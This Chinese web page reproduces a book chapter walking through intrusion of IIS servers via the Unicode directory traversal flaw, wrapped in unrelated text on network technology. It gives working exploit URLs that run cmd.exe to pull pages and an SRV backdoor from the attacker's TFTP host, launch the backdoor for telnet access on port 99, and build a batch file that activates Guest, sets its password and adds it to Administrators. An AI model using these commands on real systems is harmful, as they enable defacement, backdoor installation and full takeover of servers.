網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據資源、信息資源、知識資源、專家資源、大型數據庫、網絡、傳感器等。 當前的互聯網只限于信息共享,網絡則被認為是互聯網發展的第三階段。 6.9 UNICODE漏洞入侵(4) 6.9.3 UNICODE漏洞入侵高級篇一般的入侵者在簡單的更改頁面后就離去,而遇上一些技術較高的入侵者則要完全控制存在UNICODE漏洞的服務器,甚至是整個局域網絡,有時甚至還格式化被入侵成功的服務器,或者上傳后門工具,上傳病毒等,破壞手法各不相同,這樣將給被害服務器造成重大的危害。接下來結合前面所了解的內容,看看入侵者是如何破解系統控制整個服務 器的。 入侵者直接通過過瀏覽器來更改目標機的主頁,也只具有Guest的權限,為了可以獲取更高的權限,入侵者將使用一個TFTP的程序,將自己的計算機做成一個FTP主機,然后通過向目標服務器上傳后門工具,從而來獲取更高的權限,接下來將看看入侵者是如何利用TFTP軟件對存在UNICODE漏洞的服務器進行攻擊的。 (1) 入侵者首先會下載TFTP軟件,首先來認識一下這個程序,這是一個小巧的FTP服務器,在運行它之前首先關閉其他FTP服務器,以保持TFTP的運行,當運行此程序后,入侵者的機器已經是一個FTP服務器了。 運行TFTP后將出現如圖6-89所示的畫面。 圖6-89 TFTP啟動界面 Base Directory顯示的是TFTP所在的目錄,從圖4-1中Base Directory可以看出TFTP存放在E盤的TFTP文件夾中。如果要向目標機上傳文件,該文件必須存放在Base Directory顯示的路徑下。Servet Address中顯示的是服務器的IP地址,該程序將自動顯示本地機IP地址。Current Action指當前動作,如果沒有連接目標機的話,則顯示【監聽69端口】。通過單擊Settings按鈕來設置更多的選項。最小化TFTP程序后TFTP將變成小圖標被放置到任務欄 (2) 接下來入侵者找到一臺存在UNICODE漏洞的服務器,找到存放主頁的位置(比如C:\\inetpub\\scripts\\wwwroot\index.htm)并查出其首頁名(這里比如其首頁文件名是index.htm),然后打開瀏覽器窗口,在地址欄中輸入以下內容: http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp -i ???.???.???.??? GET index.htm c:\\inetpub\\scripts\\wwwroot\index.htm 提示: “???.???.???.???”為本機的IP地址,也就是TFTP中Servet Address文本框中顯示的IP地址,這里以127.0.0.1為檢測地址。index.htm是目標機的首頁名,入侵者將制作好的頁面存放到TFTP文件夾下(如圖6-90),上傳到目標服務器中覆蓋原有的index.htm文件,從而達到完全更改首頁的目的(如圖6-91)。c:\\inetpub\\scripts\\wwwroot\index.htm為目標機主頁存放的位置。 圖6-90 將要上傳的index.htm文件放入tftp文件夾中 圖6-91 被更改的頁面 (3) 完全控制主機。入侵者如果要想完全控制存在UNICODE漏洞的主機,并取得超級管理員的權限,一是使用TFTP工具上傳后門程到目標機,二是在目標機上建立一個批處理文件,并寫向其中寫入建立Administrator用戶的指令,從而取得超級用戶的權限,并完全控制目標服務器。 ● 使用TFTP軟件向目標機上傳后門程序,比如藍色火焰、SRV等后門程序。下面以后門程序SRV為示例,如果在目標機上運行后將會開啟99號端口,可以通過Telnet登錄到目標機。入侵者首先將SRV程序放置到TFPT所在的文件夾中,并運行TFTP程序,可在瀏覽器的地址覽中輸入如下內容: http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp -i ???.???.???.??? GET srv.exe d:\\inetpub\\scripts\\srv.exe 提示: 將TFTP文件夾下srv程序上傳至目標機D盤inetpub\scripts\下。 此時TFTP程序窗口中顯示該程序被成功上傳至目標機,如圖6-92所示。 圖6-92 TFTP運行界面 也可以向瀏覽器的地址覽中輸入如下內容來查看該后門程序是否被上傳: http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+d:\inetpub\scripts SRV后門程序被成功上傳至目標服務器后,接著入侵者會向瀏覽器的地址欄中輸入如下內容來啟動該后門程序: http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+d:\inetpub\scripts\srv.exe 當SRV后門程序被啟動后,此時目標服務器已開放了一個99端口,入侵者可以通過Telnet程序直接登錄到目標服務器。 其步驟是:選擇【開始】→【運行】命令,在【運行】對話框的【打開】下拉列表框中輸入telnet 127.0.0.1 99或是打開MS-DOS(Windows 2000中打開命令提示符),在提示符下輸入telnet 127.0.0.1 99后按Enter鍵,意思是:遠程登錄到目標機99端口。 成功后將如圖6-93所示(以中文版Windows 2000登錄為例): 圖6-93 通過srv程序遠程登錄到目標服務器 ● 通過建立批除理文件,來獲取超級用戶的權限,并完全達到控制服務器的目的。 入侵者找到存在UNICODE漏洞的主機后,入侵者將會向存在UNICODE漏洞的服務器提交以下3條請求: http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd".exe?/c echo net user guest /active:yes>123.bat 如圖6-94所示。 圖6-94 激活用戶名Guest 提示: 利用echo命令和管道命令>將net user guest /active:yes寫入到批處理文件123.bat中,net user guest /active:yes命令是指將用戶名guest激活,bat就是批處理文件的擴展名,這里的123.bat文件將通過管道命令>自己建立,并存在inetpub/scripts文件下。 http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo net user guest 12345>>123.bat 提示: 追加net user guest 12345命令到123.bat文件中,net user guset 12345命令是指為用戶名Guest設置密碼為12345。 http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo net localgroup administrators /add guest>>123.bat 提示: 追加net localgroup administrators/add guest命令到123.bat文件中,net localgroup administrators /add guest命令是指將Guest用戶名添加到Administrators組里,也就是超級用戶組里。 這時可以使用Type命令查看123.bat的內容,查看上面3條命令內容是否被追加到文件123.bat中,向瀏覽器中的地址框輸入以下內容: http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+type+d:\inetpub\scripts\123.bat 如圖6-95所示。 圖6-95 查看123.bat文件的內容 接下來讓服務器運行123.bat文件(運行方法前面已介紹),此時用戶Guest將被添加到Administrators組里,密碼為12345,此時入侵者可以通過很多方法來達到完全控制服務器的目的。 網絡的神奇作用吸引著越來越多的用戶加入其中,正因如此,網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......,各項技術都需要適時應勢,對應發展,這正是網絡迅速走向進步的催化劑。 |
溫馨提示:喜歡本站的話,請收藏一下本站!